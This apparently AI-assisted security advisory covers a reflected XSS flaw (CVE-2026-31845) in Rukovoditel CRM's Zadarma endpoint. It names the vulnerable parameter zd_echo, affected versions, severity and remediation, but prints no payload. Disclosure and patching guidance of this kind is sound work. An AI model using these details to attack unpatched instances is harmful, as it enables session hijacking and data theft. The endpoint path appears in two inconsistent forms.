Reflected XSS in Rukovoditel CRM enables session compromise
TL;DR — An unauthenticated reflected XSS in Rukovoditel CRM’s Zadarma endpoint can execute attacker-controlled JavaScript in a victim’s session when they open a crafted link.
What happened
Rukovoditel CRM is a web-based customer relationship management application. CVE-2026-31845 describes a reflected cross-site scripting (XSS) vulnerability in the Zadarma telephony API endpoint /_api/tel/zadarma.php, where the application reflects the zd_echo GET parameter directly into the HTTP response without proper output encoding.
Per the CVE record, exploitation is unauthenticated and requires user interaction (a victim visiting an attacker-crafted URL), enabling typical XSS outcomes such as session hijacking, credential theft, phishing, or account takeover.
| Item | Source value |
|---|---|
| Affected software | Rukovoditel CRM |
| Vulnerable endpoint | /api/tel/zadarma.php |
| Vulnerable parameter | zd_echo (GET) |
| Weakness | CWE-79 (Reflected XSS) |
| Severity | CVSS v3.1 9.3 (Critical) (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N) |
| Affected versions | 3.6.4 (and earlier, per description) |
| Unaffected version (source) | 3.7 |
XSS in business apps remains a high-leverage issue because these systems often sit on identity-bearing sessions (support/admin workflows) and hold sensitive customer data; a single click can be enough to pivot into broader compromise.
Who is impacted
- Deployments running
Rukovoditel CRMversion3.6.4(the CVE record states the issue exists in3.6.4 and earlier). - Instances that expose the Zadarma integration endpoint
/_api/tel/zadarma.phpto users who could be targeted with crafted links. - Organizations where Rukovoditel sessions have access to high-value data (customer records, notes, attachments) or privileged administrative actions that can be triggered from an authenticated browser session.
What to do now
- Follow vendor remediation guidance and apply the fixed release referenced by the CVE record (the record lists
3.7asunaffected). - Inventory where
Rukovoditel CRMis deployed and confirm running versions (VM images, containers, and deployed artifacts), focusing on internet- or partner-exposed instances. - Until updates are applied, reduce exposure of the vulnerable route where feasible (e.g., restrict access to
/api/tel/zadarma.phpto trusted networks) and monitor for suspicious requests containingzd_echo=payloads. - If you suspect exploitation, treat this as potential session compromise: review authentication logs and rotate credentials/tokens that could be exposed via an authenticated browser session.
Content is AI-assisted and reviewed by our team, but issues may be missed and best practices evolve rapidly, send corrections to [email protected]. Always consult official documentation and validate key implementation decisions before making design or security choices.